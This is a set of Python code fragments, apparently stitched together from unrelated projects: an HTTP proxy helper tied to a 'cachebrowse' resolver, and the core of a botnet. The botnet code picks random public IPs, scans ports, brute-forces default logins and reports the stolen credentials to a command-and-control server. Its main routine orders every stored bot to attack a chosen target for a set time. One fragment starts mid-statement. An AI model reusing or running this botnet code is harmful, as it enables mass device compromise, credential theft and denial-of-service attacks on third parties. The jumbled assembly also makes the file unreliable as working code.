def request(url, method=None, target=None, cachebrowse=None, headers=None, port=None, scheme='http', raw_request=None): if raw_request is not None and (headers is not None or method is not None): raise ValueError("Can't specify raw request and request method/headers together") if target and cachebrowse: raise ValueError("Can't specify target and use cachebrowse together") if cachebrowse is None: cachebrowse = True headers = headers or {} method = method or 'GET' if '://' not in url: url = scheme + '://' + url parsed_url = urlparse.urlparse(url, scheme=scheme) path = parsed_url.path or '/' if target: target, cachebrowsed = resolve.resolve_host(target, use_cachebrowser_db=cachebrowse) else: target, cachebrowsed = resolve.resolve_host(parsed_url.hostname, use_cachebrowser_db=cachebrowse) # if not cachebrowsed: # target = parsed_url.hostname sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) if parsed_url.scheme == 'https': sock = ssl.wrap_socket(sock) sock.connect((target, port or (443 if parsed_url.scheme == 'https' else 80))) if raw_request is None: headers = headers or {} for header in headers.keys(): if ':' in header: del headers[header] headers["Host"] = parsed_url.hostname http_request = httplib.HTTPConnection(target, 80) http_request.sock = sock http_request.request(method, path, headers=headers) http_request.response_class = HttpResponse response = http_request.getresponse() else: sock.send(raw_request) response = HttpResponse(sock, method=method) response.begin() return response
def run(): ''' Initiates and executes the bot From here, all hell breaks loose, unless that debug flag is set! ''' while True: if DEBUG: target = resolve.resolve_host(TEST_ADDR) else: target = ip.generate_random_public_ip() open_ports = scan.scan_ports(target, ATTACK_PORTS) for port in open_ports: (username, password) = login.brute_credentials( target, port ) # Some default passwords are empty if username: report.report_new_bot_credentials( CNC_SERV_ADDR, CNC_SERV_PORT, target, port, username, password )
def _connect_upstream(self, host, port): ip, cachebrowsed = resolve.resolve_host(host) if not ip: return # Return response to client self.connection.send_local("HTTP/1.1 200 OK\r\n\r\n") # Create remote socket sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Shouldn't use SSL, ssl is forwarded directly from the client # sock = ssl.wrap_socket(sock) sock.connect((ip, port)) self._upstream_started = True self._host = host # ! Ref to connection._buffer not updated self._buffer = StringIO.StringIO() # !! Why does this line not work here? # self.connection.send_local("HTTP/1.1 200 OK\r\n\r\n") self.connection.start_remote(sock) return True
def generate_random_public_ip(): ''' Generates a random public IP address to attack Returns a valid public IPv4 address ''' while True: a = random.randint(1, 223) b = random.randint(1, 223) c = random.randint(1, 223) d = random.randint(1, 223) if a in IP_PREFIX_BLACKLIST: continue if a == int(LOOPBACK_ADDR[:3]): continue if is_private_ip(a, b, c): continue block = [a, b, c, d] addr = '.'.join(map(str, block)) if resolve.resolve_host(addr) is None: continue return addr
def report_new_bot_credentials( cnc_serv_addr, cnc_serv_port, target, port, username, password ): ''' Connects to the command-and-control server and sends the login credentials of the vulnerable device to the server * cnc_serv_addr - IP address of the CNC server * cnc_serv_port - port to connect back to the CNC server * target - the IP address of the vulnerable device * port - port of the vulnerable device * username - username of vulnerable device * password - password of vulnerable device ''' if not resolve.resolve_host(cnc_serv_addr): print('[-] Failed to resolve remote host: %s' % cnc_serv_addr) sys.exit(1) socket.setdefaulttimeout(TIMEOUT_LEN) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: sock.connect((cnc_serv_addr, cnc_serv_port)) print('[+] Connected to CNC server') except: print('[-] Unable to connect to CNC server') sys.exit(1) creds = { 'addr': target, 'port': port, 'username': username, 'password': password } packet = json.dumps(creds) sock.send(packet) print('[+] Delivered credentials to CNC server')
required=True, help='set duration of attack between 1 and 3600 seconds') parser.add_argument('-t', '--target', metavar='target', dest='target', required=True, help='specify domain name/IPv4 address to attack') return parser.parse_args() if __name__ == '__main__': args = parse_args() target_ip = resolve.resolve_host(args.target) if target_ip is None: print('[!] Unable to launch attack') sys.exit(1) attack_type = ATTACK_TYPES[args.attack_type] conn = database.open_database(DB_PATH) cur = conn.cursor() for bot in cur.execute('SELECT * FROM Bots'): t = threading.Thread(target=attack.launch_attack, args=(bot, attack_type, args.duration, target_ip)) t.start() t.join() conn.close()